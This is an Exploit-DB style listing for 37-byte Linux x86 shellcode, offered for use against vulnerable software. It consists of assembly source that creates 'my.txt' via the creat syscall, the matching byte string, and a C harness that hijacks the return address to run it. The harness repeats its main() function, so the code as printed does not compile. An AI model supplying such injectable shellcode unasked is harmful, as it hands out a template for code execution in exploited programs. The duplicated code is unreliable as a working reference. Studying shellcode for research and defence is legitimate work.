Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)

EDB-ID:

36701

CVE:

N/A




Platform:

Linux_x86

Date:

2015-04-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

/*
#Title: Create 'my.txt' in present working directory of vulnerable software
#Length: 37 bytes
#Date: 3 April 2015
#Author: Mohammad Reza  Ramezani (mr.ramezani.edu [at] gmail com - g+) 
#Tested On: kali-linux-1.0.6-i386




Section   .text
global _start

_start:
push byte 8
pop eax
jmp short GoToCall
shellcode:
pop ebx
xor edx, edx
mov [ebx + 6], dl
push word 0544o
pop ecx
int 0x80

push byte 1
pop eax
xor ebx, ebx
int 0x80


GoToCall:
call shellcode
db 'my.txtX'


This shellcode can generalized by using of absolute path instead of 'my.txt'
*/

char shellcode[] = "\x6a\x08\x58\xeb\x14\x5b\x31\xd2"
"\x88\x53\x06\x66\x68\x64\x01\x59\xcd\x80\x6a\x01\x58"
"\x31\xdb\xcd\x80\xe8\xe7\xff\xff\xff\x6d\x79\x2e\x74"
"\x78\x74\x58";

int main()
{
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int)shellcode;
}


int main()
{
	int *ret;
	ret = (int *)&ret + 2;
	(*ret) = (int)shellcode;
}